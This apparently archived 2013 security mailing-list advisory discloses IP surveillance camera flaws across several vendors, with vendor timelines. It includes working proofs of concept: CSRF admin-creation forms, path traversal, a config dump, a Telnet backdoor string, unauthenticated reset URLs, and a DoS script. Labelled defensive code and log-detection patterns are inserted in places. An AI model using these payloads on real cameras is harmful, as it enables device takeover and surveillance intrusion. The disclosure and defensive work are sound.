Full Disclosure mailing list archives
Security Analysis of IP video surveillance cameras
From: Javier Repiso Sánchez <javier.repiso () hotmail com>
Date: Wed, 12 Jun 2013 10:19:16 +0200
Dear sirs,

We are a group of students from the European University of Madrid who have done a security analysis of IP video surveillance cameras as the final project of the Security and Information Technology Master's. In total, we analyzed 9 different camera brands and we have found 14 vulnerabilities.
These vulnerabilities are of all kinds: simple ones, such as XSS or CSRF, and very harmful and dangerous ones such as privilege escalation or authentication bypass.
**Note that all the analysis we have done has been from cameras found through Google dorks and Shodan, so we have not needed to purchase any of them for our tests. Everything we needed was online.

In conclusion, we can say that the vast majority of security cameras are not ready to be connected to an open network where everyone can get access to them.

We proceed to describe all previously reported vulnerabilities, ordered by brand:

===========================================================================
AIRLIVE
===========================================================================

1.Advisory Information

Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last update: 12/06/2013

2.Vulnerability Description

Multiple vulnerabilities have been found in these devices:

-CVE-2013-3540. Cross Site Request Forgery (CWE-352) and Clickjacking (CAPEC-103)
-CVE-2013-3541. Relative Path Traversal (CWE-23)
-CVE-2013-3686. Information Exposure (CWE-200) and Permissions, Privileges and Access Controls (CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information (CWE-312)
-CVE-2013-3691. Denial of Service

3.Affected Products

CVE-2013-3541, CVE-2013-3686: the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687: the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.
It's possible other models are affected, but they were not checked.

4.PoC

4.1.Cross Site Request Forgery (CSRF)

CVE-2013-3540, CSRF via GET method. Targeted attack against any administrator.

These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can mount targeted attacks by getting a logged-in administrator to load a crafted URL, which lets the attacker manipulate web interface parameters. In the following example the vector creates an additional user with administrator credentials:
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
_____________________________________________________________________________

4.2.Relative Path Traversal

CVE-2013-3541, path traversal that allows you to read configuration files from the device's file system:

_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________

4.3.Sensitive Information Exposure + Privilege Escalation

CVE-2013-3686, exposure of sensitive data by requesting the following URL:

_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________

The admin password is returned base64-encoded, so we can decode it, log in again as the admin user, and the privilege escalation is complete.

4.4.Clear Text Storage of Sensitive Information

CVE-2013-3687. All the sensitive information about the device is stored in plain text inside the backup file. You can open it with any text editor and look for user information, for example passwords, user names and so on.

4.5.Denial of Service (DoS)

CVE-2013-3691, DoS by overflowing the request path '/'. A request with a large number of 'a' characters can take down the HTTP service of the camera.

_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________

You will get the following message: Connection has been reset.
After removing the 'a's and refreshing, you will get the following message: Can't Connect.

It will be down for around 2 minutes, but if the request is repeated, for example once every minute, the camera never recovers by itself.

The following Python script could be used to test the DoS:

_____________________________________________________________________________
import socket

cam_ip = 'xx.xx.xx.xx'  # target camera

# Oversized request path: 3000 'A's. Repeat the request periodically to keep the service down.
request = 'GET /' + 'A' * 3000 + '.html HTTP/1.0\r\n\r\n'
s = socket.socket()
s.connect((cam_ip, 80))
s.sendall(request.encode())
response = s.recv(1024)
s.close()
_____________________________________________________________________________

5.Credits

-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3540, CVE-2013-3686 and CVE-2013-3687 were discovered by Jonás Ropero Castillo.

6.Report Timeline

-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received.
-2013-06-03: Students ask for a reply.
-2013-06-05: Airlive team reports to technical support to analyze the vulnerabilities.

===========================================================================
AXIS
===========================================================================

1.Advisory Information

Title: AXIS Media Control ActiveX vulnerability
Date Published: 12/06/2013
Date of last update: 12/06/2013

2.Vulnerability Description

A vulnerability has been found in these devices:

-CVE-2013-3543. Exposed Unsafe ActiveX Method (CWE-618)

3.Affected Products

CVE-2013-3543: all camera devices using AXIS Media Control (AMC) are affected.
The vulnerability affects the latest version of the software (6.2.10.11, which was released on October 19, 2012).

4.PoC

4.1.Exposed Unsafe ActiveX Method - File Corruption
On the vendor web site you can see that "AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer."

This vulnerability can be exploited by a remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system. The vulnerability exists because the ActiveX control exposes the insecure "StartRecord()", "SaveCurrentImage()" and "StartRecordMedia()" methods in the "AxisMediaControlEmb.dll" DLL, each of which takes a caller-supplied file path. This can be exploited to corrupt or create arbitrary files in the context of the current user.

In the following example we corrupt regedit.exe using one of the vulnerable ActiveX methods. When we click on one of the buttons, we can see that regedit.exe is overwritten with garbage.

The following code could be used to test the vulnerability:

_____________________________________________________________________________
<html>
<head>
<title></title>
<script language="javaScript" type="text/javascript">
function startRecord(){
    var theFile = "FilePath//File_name_to_corrupt_or_create";
    MyActiveX.StartRecord(theFile);
}
function saveCurrentImage(){
    var theFile = "FilePath//File_name_to_corrupt_or_create";
    var theFormat = 1;
    MyActiveX.SaveCurrentImage(theFormat, theFile);
}
function startRecordMedia(){
    var theFile = "FilePath//File_name_to_corrupt_or_create";
    var theFlags = 1;
    var theMediaTypes = "default";
    MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes);
}
</script>
</head>
<body>
<object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480">
    <param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg">
    <param name="MediaType" value="mjpeg">
    <param name="Volume" value="1">
    <param name="ShowStatusBar" value="1">
    <param name="ShowToolbar" value="1">
    <param name="AutoStart" value="1">
    <param name="UIMode" value="ptz-relative">
    <param name="MediaType" value="mjpeg-unicast">
    <param name="StretchToFit" value="0">
    <param name="PTZControlURL" value="http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi">
</object>
<br>
<INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()">
<INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()">
<INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()">
</body>
</html>
_____________________________________________________________________________

5.Credits

-CVE-2013-3543 was discovered by Javier Repiso Sánchez.

6.Report Timeline

-2013-05-24: Students team notifies the Axis Customer Support of the vulnerability.
-2013-05-24: Axis team asks for a report with technical information.
-2013-05-26: Technical details sent to Axis.
-2013-05-27: Axis team reports to technical support to analyze the vulnerability.

===========================================================================
BRICKCOM
===========================================================================

1.Advisory Information

Title: Brickcom 100ap Series Vulnerabilities
Date Published: 12/06/2013
Date of last update: 12/06/2013

2.Vulnerability Description

Multiple vulnerabilities have been found in this device:

-CVE-2013-3689. Authentication Bypass Issues (CWE-592) and Clear Text Storage of Sensitive Information (CWE-312)
-CVE-2013-3690. Cross Site Request Forgery (CWE-352), Permissions, Privileges, and Access Control (CWE-264) and Execution with Unnecessary Privileges (CWE-250)

3.Affected Products

The following products are affected by these vulnerabilities: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E
It's possible other models are affected, but they were not checked.

-CVE-2013-3689. We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1
In the following firmwares you need to be logged in as administrator to download this file, but the information is still in plain text: firmwareVersion=v3.1.0.8, v3.1.0.4
-CVE-2013-3690. All firmwares checked.
4.PoC

4.1.Authentication Bypass & Clear Text Storage of Sensitive Information

CVE-2013-3689. This allows you to download the whole device configuration file by requesting the following URL (all data shown will be in plain text). No authentication is necessary.

_____________________________________________________________________________
http://xx.xx.xx.xx/configfile.dump?action=get
_____________________________________________________________________________

The most interesting parameters could be:

UserSetSetting.userList.users[nº].password= ***
UserSetSetting.userList.users[nº].name= ***

4.2.Cross Site Request Forgery (CSRF) + Privilege Escalation

CVE-2013-3690, CSRF is possible via POST method. Privilege escalation from a viewer user to an administrator user is also possible.

These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can mount targeted attacks by getting a logged-in user to load a crafted page, which lets the attacker manipulate web interface parameters. The following page exploits this vulnerability:

_____________________________________________________________________________
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">
    <input type="hidden" name="action" value="add">
    <input type="hidden" name="index" value="0">
    <input type="hidden" name="username" value="test2">
    <input type="hidden" name="password" value="test2">
    <input type="hidden" name="privilege" value="1">
    <script>document.gobap.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________

5.Credits

-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3690 was discovered by Jonás Ropero Castillo.

6.Report Timeline

-2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities.
-2013-05-31: Brickcom answers agreeing with some of the vulnerabilities, but there are some that they think are not correct. (CVE-2013-3689, authentication bypass and plain text information: after talking with the vendor, it looks like this bug is fixed from firmware 3.1.x.x onwards, but the information is still shown in plain text, so they should fix this second one.)
-2013-06-03: Students check and communicate to Brickcom the detailed products and firmwares affected by the vulnerabilities.
-2013-06-04: The vendor agrees with everything stated and reports that it will fix it as soon as possible.

===========================================================================
GRANDSTREAM
===========================================================================

1.Advisory Information

Title: Grandstream Series Vulnerabilities
Date Published: 12/06/2013
Date of last update: 12/06/2013

2.Vulnerability Description

The following vulnerabilities have been found in these devices:

-CVE-2013-3542. Backdoor in Telnet Protocol (CAPEC-443)
-CVE-2013-3962. Cross Site Scripting (CWE-79)
-CVE-2013-3963. Cross Site Request Forgery (CWE-352) and Clickjacking (CAPEC-103)

3.Affected Products

CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963: the following products are affected: GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD and GXV3500.
It's possible other models are affected, but they were not checked.

4.PoC

4.1.Backdoor in Telnet Protocol

CVE-2013-3542, backdoor in the Telnet service. Connect via telnet to any affected camera (the service is open by default) and enter the magic string "!#/" as both username and password. You will get the admin settings menu.
If you type "help", the following commands are shown:

=======================================================
help, quit, status, restart, restore, upgrade, tty_test
=======================================================

@@@ restore (Reset settings to factory default)

The attacker can take control of the device, which makes these devices very vulnerable.

4.2.Cross Site Scripting (XSS)

CVE-2013-3962, non-persistent Cross Site Scripting:

_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________

4.3.Cross Site Request Forgery (CSRF)

CVE-2013-3963, CSRF via GET method.

These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can mount targeted attacks by getting a logged-in administrator to load a crafted URL, which lets the attacker manipulate web interface parameters. Use the following URL to replicate the attack:

_____________________________________________________________________________
http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
_____________________________________________________________________________

5.Credits

-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jonás Ropero Castillo.

6.Report Timeline

-2013-05-31: Students open a ticket to notify the Grandstream Customer Support of CVE-2013-3542.
-2013-05-31: Grandstream team reports to technical support to analyze the vulnerability.
-2013-06-11: Students open a ticket to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities.
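The CSRF and path-traversal findings above (Airlive 4.1 and 4.2, Brickcom 4.2, Grandstream 4.3) share one root cause: the CGI handlers act on whatever the request carries, with no check that a logged-in user actually intended the request and no check that a supplied file path stays inside the directory it is meant to serve. The following Python is an added example written for this page, not code from the advisory or from any vendor's firmware. It models a minimal CGI dispatcher using the Airlive endpoint names from the PoCs, first as reported and then hardened. The config root, the session token, the header names and reading form fields from the query string are assumptions made for illustration.

```python
import hmac
import os
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed stand-ins for the camera's state (assumptions, not vendor code).
USERS = {"admin": {"pwd": "admin", "grp": "administrator"}}
CONFIG_ROOT = "/tmp/camcfg"            # hypothetical directory fileread should serve
SESSION_TOKEN = secrets.token_hex(16)  # per-session anti-CSRF token (hypothetical)


def _params(url):
    """Split the request URL into its path and a flat dict of query params.
    Form fields are taken from the query string here to keep the example
    short; a real handler would read POST fields from the body."""
    parts = urlsplit(url)
    return parts.path, {k: v[0] for k, v in parse_qs(parts.query).items()}


def vulnerable_dispatch(method, url, headers=None):
    """Reproduces the reported behaviour: usrgrp.cgi adds a user on a bare GET
    and fileread resolves whatever path the client supplies."""
    path, q = _params(url)
    if path == "/cgi-bin/admin/usrgrp.cgi" and q.get("action") == "add":
        USERS[q["user"]] = {"pwd": q["pwd"], "grp": q["grp"]}
        return 200, "user added"
    if path == "/cgi-bin/admin/fileread":
        # normpath collapses the "../" segments, so they walk out of CONFIG_ROOT:
        # /tmp/camcfg/../../../../etc/passwd becomes /etc/passwd.
        target = os.path.normpath(os.path.join(CONFIG_ROOT, q["READ.filePath"]))
        return 200, target  # the resolved path stands in for the file contents
    return 404, "not found"


def hardened_dispatch(method, url, headers=None):
    """Same endpoints with three checks added: state changes only over POST;
    the request must carry this session's anti-CSRF token and, if an Origin
    header is present, it must match the camera's own host; file reads must
    resolve to a location under CONFIG_ROOT."""
    headers = headers or {}
    path, q = _params(url)
    if path == "/cgi-bin/admin/usrgrp.cgi" and q.get("action") == "add":
        if method != "POST":
            return 405, "state change requires POST"
        # Constant-time compare so the token check does not leak by timing.
        if not hmac.compare_digest(q.get("csrf_token", ""), SESSION_TOKEN):
            return 403, "missing or bad CSRF token"
        origin = headers.get("Origin")
        if origin is not None and origin != "http://" + headers.get("Host", ""):
            return 403, "cross-origin request refused"
        USERS[q["user"]] = {"pwd": q["pwd"], "grp": q["grp"]}
        return 200, "user added"
    if path == "/cgi-bin/admin/fileread":
        root = os.path.realpath(CONFIG_ROOT)
        target = os.path.realpath(os.path.join(root, q.get("READ.filePath", "")))
        # realpath also follows symlinks, so a link planted inside the root
        # that points outside it fails the same containment test.
        if os.path.commonpath([root, target]) != root:
            return 403, "path escapes config root"
        return 200, target
    return 404, "not found"
```

The token is the primary CSRF defence; the Origin comparison is a second line that costs nothing when browsers send the header. Note that the traversal fix is a containment test on the resolved path, not a blacklist of "../": encoded or doubled variants never reach the filesystem with a different meaning than the check saw.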
===========================================================================
SAMSUNG
===========================================================================

1.Advisory Information

Title: Samsung Series Vulnerability
Date Published: 12/06/2013
Date of last update: 12/06/2013

2.Vulnerability Description

The following vulnerability has been found in these devices:

-CVE-2013-3964. Cross Site Scripting (CWE-79)

3.Affected Products

CVE-2013-3964: the following products are affected: SHR-5162, SHR-5082
It's possible other models are affected, but they were not checked: SHR-5XXX, SHR-516X, SHR-508X, SHR-5042, SHR-4160, SHR-4081, SHR-2XXX, SHR-216X, SHR-208X, SHR-204X

4.PoC

4.1.Cross Site Scripting (XSS)

CVE-2013-3964, non-persistent Cross Site Scripting:

_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________

5.Credits

-CVE-2013-3964 was discovered by Jonás Ropero Castillo.

6.Report Timeline

-2013-06-11: Students try to contact the Samsung Support Centre, but the service is temporarily down.

===========================================================================
SONY
===========================================================================

1.Advisory Information

Title: Sony CH, DH Series Vulnerability
Date Published: 12/06/2013
Date of last update: 12/06/2013

2.Vulnerability Description

The following vulnerability has been found in these devices:

-CVE-2013-3539. Cross Site Request Forgery (CWE-352)

3.Affected Products

CVE-2013-3539: the following products are affected: SNC CH140, SNC CH180, SNC CH240, SNC CH280, SNC DH140, SNC DH140T, SNC DH180, SNC DH240, SNC DH240T and SNC DH280.
It's possible other models are affected, but they were not checked.
4.PoC

4.1.Cross Site Request Forgery (CSRF)

CVE-2013-3539, CSRF via POST method. Targeted attack against any administrator.

These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can mount targeted attacks by getting a logged-in administrator to load a crafted page, which lets the attacker manipulate web interface parameters. This is our .html attack:

_____________________________________________________________________________
<html>
<body>
<form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
    <input type="Select" name="ViewerModeDefault" value="00000fff">
    <input type="Hidden" name="ViewerAuthen" value="off">
    <input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
    <input type="Hidden" name="User1" value="xxxx,c0000fff">
    <input type="Hidden" name="User2" value="xxxx,c0000fff">
    <input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
    <input type="Hidden" name="User4" value="Og==,00000fff">
    <input type="Hidden" name="User5" value="Og==,00000fff">
    <input type="Hidden" name="User6" value="Og==,00000fff">
    <input type="Hidden" name="User7" value="Og==,00000fff">
    <input type="Hidden" name="User8" value="Og==,00000fff">
    <input type="Hidden" name="User9" value="Og==,00000fff">
    <input type="Hidden" name="Reload" value="referer">
    <script>document.SonyCsRf.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________

Now we can check that we have a new user in the configuration.

5.Credits

-CVE-2013-3539 was discovered by Jonás Ropero Castillo.

6.Report Timeline

-2013-05-25: Students team notifies the Sony Customer Support of the vulnerability. No reply received.
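The Sony form above is easier to read once its values are decoded: "YWRtaW46YWRtaW4=" is base64 for "admin:admin", "dG1wdG1wOnRtcHRtcA==" is "tmptmp:tmptmp", and "Og==" is just ":", an empty slot. The following Python is an added example written for this page, not code from the advisory or from Sony: it decodes the user.cgi field values the way the PoC uses them and lists what the forged POST leaves behind. That each field is "base64(user:password)[,hexmask]" and that ViewerAuthen=off disables viewer authentication are assumptions read off the PoC values, not vendor documentation.

```python
import base64
import binascii


def decode_credential(value):
    """Decode one user.cgi field value of the form "<base64>[,<hex mask>]".
    Returns (username, password, mask) or None when the value is a placeholder
    (the PoC's "xxxx") that does not decode to a "user:password" string."""
    blob, _, mask = value.partition(",")
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, pwd = text.partition(":")
    if not sep:
        return None
    return user, pwd, (mask or None)


def audit_user_config(fields):
    """Return every populated account in the form as {field: (user, pwd, mask)},
    skipping placeholders and the empty "Og==" (":") slots."""
    accounts = {}
    for name, value in fields.items():
        if name != "Administrator" and not name.startswith("User"):
            continue
        decoded = decode_credential(value)
        if decoded is None or not decoded[0]:
            continue
        accounts[name] = decoded
    return accounts


def findings(fields):
    """What the forged POST leaves on the camera, as an auditor would list it.
    Treating ViewerAuthen=off as "viewer authentication disabled" is an
    assumption read from the field name."""
    out = []
    if fields.get("ViewerAuthen", "").lower() == "off":
        out.append("viewer authentication disabled")
    for name, (user, pwd, _mask) in audit_user_config(fields).items():
        if user == pwd:
            out.append(f"{name}: password equals username ({user})")
    return out


# Constructed from the values in the PoC form above.
POC_FORM = {
    "ViewerModeDefault": "00000fff",
    "ViewerAuthen": "off",
    "Administrator": "YWRtaW46YWRtaW4=",
    "User1": "xxxx,c0000fff",
    "User2": "xxxx,c0000fff",
    "User3": "dG1wdG1wOnRtcHRtcA==,c0000fff",
    "User4": "Og==,00000fff",
    "Reload": "referer",
}
```

The same decoder applies to a captured user.cgi POST or to a configuration backup that stores these fields, which is the quickest way to confirm after the fact whether a camera has been hit by this vector.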
===========================================================================
TP-LINK
===========================================================================

1.Advisory Information

Title: TP-LINK TL-SC3171 Vulnerability
Date Published: 12/06/2013
Date of last update: 12/06/2013

2.Vulnerability Description

The following vulnerability has been found in this device:

-CVE-2013-3688. Authentication Bypass Issues (CWE-592) and Execution with Unnecessary Privileges (CWE-250)

3.Affected Products

-CVE-2013-3688. The following product is affected: TP-LINK TL-SC3171
It's possible other models are affected, but they were not checked.

4.PoC

4.1.Execute Remote Command bypassing authentication

CVE-2013-3688, remote command execution bypassing authentication. We have found that it is possible to reboot this kind of device remotely. The attack vectors are the following:

_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/reboot
http://xx.xx.xx.xx/cgi-bin/hardfactorydefault
_____________________________________________________________________________

With the first one you get a blank page and cannot log in again until the device has rebooted. With the second one you get a success message and, of course, on the next login you have to enter the factory settings.

5.Credits

-CVE-2013-3688 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.

6.Report Timeline

-2013-05-31: Students team notifies the TP-Link Customer Support of the vulnerability. No reply received.
-2013-06-03: Students ask for a reply.
-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability before and it has been corrected in a new beta firmware version.
-2013-06-04: Students answer the vendor saying that this vulnerability is different from the Coresecurity vulnerabilities.
-2013-06-05: TP-Link answers saying this vulnerability is the same as the vulnerability reported by Coresecurity.
-2013-06-05: Students respond by explaining the details of the vulnerability and confirming that the vulnerability is different.
-2013-06-06: TP-Link answers confirming that the vulnerability is fixed with the latest patch for the vulnerabilities reported by Coresecurity. The beta version is available on the TP-Link web site.

AUTHORS

Eliezer Varadé Lopez
Javier Repiso Sánchez
Jonás Ropero Castillo
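Every HTTP vector in this advisory leaves a recognisable request line in the camera's, or a fronting proxy's, access log, which matters because most of these devices cannot be patched quickly and the only practical control is to watch for exploitation. The following Python is an added example written for this page, not part of the advisory: it runs a small rule set derived from the PoC URLs above (Airlive, Brickcom, Grandstream, Sony and TP-LINK, plus the XSS probes and the oversized-path DoS) over constructed Apache-style log lines and groups the hits by source address. The log lines, the 2048-byte path threshold and the rule labels are assumptions for illustration; the Telnet backdoor does not appear in HTTP logs and is out of scope here.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined"-style request line; the sample format is constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3})'
)

# (label, required method or None, pattern applied to the URL-decoded target)
RULES = [
    ("CVE-2013-3540 airlive usrgrp.cgi user add", None,
     re.compile(r"/cgi-bin/admin/usrgrp\.cgi\?.*action=add")),
    ("CVE-2013-3541 airlive fileread traversal", None,
     re.compile(r"/cgi-bin/admin/fileread\?.*READ\.filePath=.*\.\./")),
    ("CVE-2013-3686 airlive General.UserID listing", None,
     re.compile(r"/cgi-bin/operator/param\?.*group=General\.UserID")),
    ("CVE-2013-3689 brickcom configfile.dump", None,
     re.compile(r"/configfile\.dump\?action=get")),
    ("CVE-2013-3690 brickcom users.cgi POST", "POST",
     re.compile(r"/cgi-bin/users\.cgi")),
    ("CVE-2013-3963 grandstream usermanage add", None,
     re.compile(r"/goform/usermanage\?.*cmd=add")),
    ("CVE-2013-3539 sony user.cgi POST", "POST",
     re.compile(r"/command/user\.cgi")),
    ("CVE-2013-3688 tplink unauthenticated reboot/reset", None,
     re.compile(r"/cgi-bin/(reboot|hardfactorydefault)$")),
    ("reflected XSS probe", None, re.compile(r"<script", re.IGNORECASE)),
]
LONG_PATH = 2048  # assumed threshold; the Airlive DoS PoC sends a ~3000-byte path


def classify(line):
    """Return (ip, method, [labels]) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    target = unquote(m["target"])  # catch %2e%2e%2f-style encoded traversal
    labels = [label for label, meth, rx in RULES
              if (meth is None or meth == m["method"]) and rx.search(target)]
    if len(m["target"]) >= LONG_PATH:
        labels.append("CVE-2013-3691-style oversized request path")
    return m["ip"], m["method"], labels


def scan(lines):
    """All lines that matched at least one rule, in log order."""
    hits = (classify(line) for line in lines)
    return [h for h in hits if h is not None and h[2]]


def by_source(lines):
    """Group matched labels by client address, for triage."""
    grouped = {}
    for ip, _method, labels in scan(lines):
        grouped.setdefault(ip, set()).update(labels)
    return grouped


# Constructed sample log, not captured from any real device.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jun/2013:10:19:16 +0200] "GET /cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect= HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Jun/2013:10:19:20 +0200] "GET /cgi-bin/admin/fileread?READ.filePath=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024',
    '198.51.100.7 - - [12/Jun/2013:10:21:02 +0200] "GET /configfile.dump?action=get HTTP/1.1" 200 8192',
    '198.51.100.7 - - [12/Jun/2013:10:21:09 +0200] "POST /cgi-bin/users.cgi HTTP/1.1" 200 128',
    '192.0.2.9 - - [12/Jun/2013:10:25:41 +0200] "GET /cgi-bin/hardfactorydefault HTTP/1.1" 200 64',
    '192.0.2.9 - - [12/Jun/2013:10:25:50 +0200] "GET /<script>alert(123)</script> HTTP/1.1" 404 0',
    '192.0.2.9 - - [12/Jun/2013:10:26:00 +0200] "GET /' + "a" * 3000 + '.html HTTP/1.0" 400 0',
    '192.0.2.9 - - [12/Jun/2013:10:26:30 +0200] "GET /view/index.html HTTP/1.1" 200 2048',
]
```

A 200 status on the user-add or config-dump rules is the line to alert on; a 403 or 401 on the same path means the camera, or something in front of it, refused the request. The POST-only rules cannot see form contents, so for the Brickcom and Sony endpoints any POST from an address that is not an administrator workstation should be treated as suspect.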
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Security Analysis of IP video surveillance cameras Javier Repiso Sánchez (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Leif Nixon (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Andrew Smith (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Paul Ammann (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Marcos Agüero (Jun 13)
- Re: Security Analysis of IP video surveillance cameras Vitor Ventura (Jun 12)
- Re: Security Analysis of IP video surveillance cameras Leif Nixon (Jun 12)